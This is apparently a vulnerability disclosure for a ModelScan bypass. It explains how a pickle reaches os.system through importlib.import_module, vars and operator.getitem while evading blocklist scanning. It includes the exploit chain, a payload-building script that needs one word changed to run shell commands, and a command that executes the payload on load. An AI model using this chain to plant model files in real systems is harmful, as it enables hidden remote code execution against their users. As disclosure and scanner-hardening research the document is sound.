ModelScan Bypass PoC: importlib.import_module() + builtins.vars() + operator.getitem()

Overview

A systemic bypass of ModelScan's wildcard (module.*) blocklist.
Because importlib appears in none of the blocklist levels (CRITICAL/HIGH/MEDIUM/LOW), a pickle can reference importlib.import_module as a GLOBAL and use it to import any blocked module at unpickling time. The scanner's GLOBAL-opcode check never sees a reference to the blocked module itself, so it reports nothing.

The Bypass

Python equivalent of the opcode sequence in the pickle (every name referenced by a GLOBAL opcode is unblocked; "os" and "system" travel as string data):

import importlib, operator

os_module = importlib.import_module("os")        # import os at RUNTIME (no GLOBAL for os)
os_dict = vars(os_module)                         # vars = builtins.vars (NOT blocked)
os_system = operator.getitem(os_dict, "system")   # operator.getitem (NOT blocked)
os_system("cmd")                                  # RCE: "cmd" runs in a shell at load time

Files

File                Size    Description
code_bypass.pkl     129 B   Raw pickle (protocol 5)
code_bypass.joblib  79 B    joblib format

Why This Matters

This bypass is architecturally different from dict-based bypasses:

  • It can import any blocked module at unpickling time: os, subprocess, socket, asyncio, shutil, etc.
  • The module name "os" is a string argument to import_module, not a GLOBAL reference, so a scanner that inspects GLOBAL/STACK_GLOBAL opcodes never sees a reference to os
  • No wildcard entry (os.*, subprocess.*, ...) can catch it, because the blocked module is never named in a GLOBAL opcode; only blocking importlib itself, or allowlisting the globals a checkpoint legitimately needs, addresses it
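The following added example (not code from the page, the researcher, or the ModelScan project) hand-builds a pickle carrying the importlib.import_module -> vars -> operator.getitem chain from "The Bypass" and then inspects it the way a GLOBAL-opcode scanner would, to show why a wildcard module blocklist reports nothing while an allowlist flags the chain. The module blocklist and the allowlist in the code are illustrative assumptions, not ModelScan's real configuration, and the payload targets os.getcwd instead of os.system so it is safe to run; the attribute name is the only difference.

```python
"""
Added example: build the importlib/vars/getitem pickle chain by hand and scan it.
The blocklist and allowlist below are assumptions for illustration, not ModelScan's
configuration. The payload calls os.getcwd (benign) rather than os.system.
"""
import os
import pickle
import pickletools


def _global(module: str, name: str) -> bytes:
    # GLOBAL opcode: module and name as newline-terminated text
    return pickle.GLOBAL + f"{module}\n{name}\n".encode()


def _text(s: str) -> bytes:
    # SHORT_BINUNICODE opcode (protocol 4+): 1-byte length followed by UTF-8 bytes
    data = s.encode()
    assert len(data) < 256
    return pickle.SHORT_BINUNICODE + bytes([len(data)]) + data


def build_payload(attr: str = "getcwd") -> bytes:
    """Pickle that evaluates operator.getitem(vars(importlib.import_module("os")), attr)()."""
    return (
        pickle.PROTO + b"\x04"
        + _global("operator", "getitem")          # stack: getitem
        + _global("builtins", "vars")             # stack: getitem, vars
        + _global("importlib", "import_module")   # stack: getitem, vars, import_module
        + _text("os")                             # blocked module name travels as DATA
        + pickle.TUPLE1 + pickle.REDUCE           # import_module("os")        -> os module
        + pickle.TUPLE1 + pickle.REDUCE           # vars(os)                   -> os.__dict__
        + _text(attr)
        + pickle.TUPLE2 + pickle.REDUCE           # getitem(os.__dict__, attr) -> os.<attr>
        + pickle.EMPTY_TUPLE + pickle.REDUCE      # os.<attr>()
        + pickle.STOP
    )


def referenced_globals(data: bytes) -> list:
    """(module, name) pairs that a GLOBAL/STACK_GLOBAL opcode scanner would see."""
    refs = []
    recent_strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            recent_strings.append(arg)
        elif op.name == "STACK_GLOBAL":
            # pickle emits the two operand strings right before STACK_GLOBAL; that
            # adjacency is assumed here instead of modelling the full stack
            refs.append((recent_strings[-2], recent_strings[-1]))
    return refs


# Illustrative wildcard blocklist (assumption, not ModelScan's list)
BLOCKED_MODULES = {"os", "nt", "posix", "subprocess", "socket", "shutil", "sys", "runpy"}


def blocklist_hits(data: bytes, blocked=BLOCKED_MODULES) -> list:
    """Wildcard blocklist: flag a GLOBAL whose top-level module is blocked."""
    return [ref for ref in referenced_globals(data) if ref[0].split(".")[0] in blocked]


# Illustrative allowlist of globals a tensor checkpoint legitimately needs (assumption)
ALLOWED_GLOBALS = {("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2")}


def allowlist_hits(data: bytes, allowed=ALLOWED_GLOBALS) -> list:
    """Allowlist: flag every GLOBAL that is not explicitly permitted."""
    return [ref for ref in referenced_globals(data) if ref not in allowed]


def demo(attr: str = "getcwd") -> dict:
    """Build the payload, scan it both ways, and unpickle it (runs os.<attr>())."""
    payload = build_payload(attr)
    return {
        "size": len(payload),
        "globals": referenced_globals(payload),
        "blocklist_hits": blocklist_hits(payload),
        "allowlist_hits": allowlist_hits(payload),
        "result_matches_direct_call": pickle.loads(payload) == getattr(os, attr)(),
    }


if __name__ == "__main__":
    for key, value in demo("getcwd").items():
        print(f"{key}: {value}")
```

The blocklist pass returns nothing because the only GLOBAL opcodes name operator, builtins and importlib; the allowlist pass flags all three, which is the check a practitioner would want in front of any untrusted pickle.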

Verification

pip install modelscan
modelscan --path code_bypass.pkl   # reports "No issues found"
python -c "import pickle; pickle.load(open('code_bypass.pkl','rb'))"  # executes the payload (RCE)

Run the last command only in a disposable environment: unpickling the file is what executes the payload.

Disclosure

  • Researcher: xiaoyaoes
  • Date: 2026-06-19
  • Status: Reported via Huntr MFV program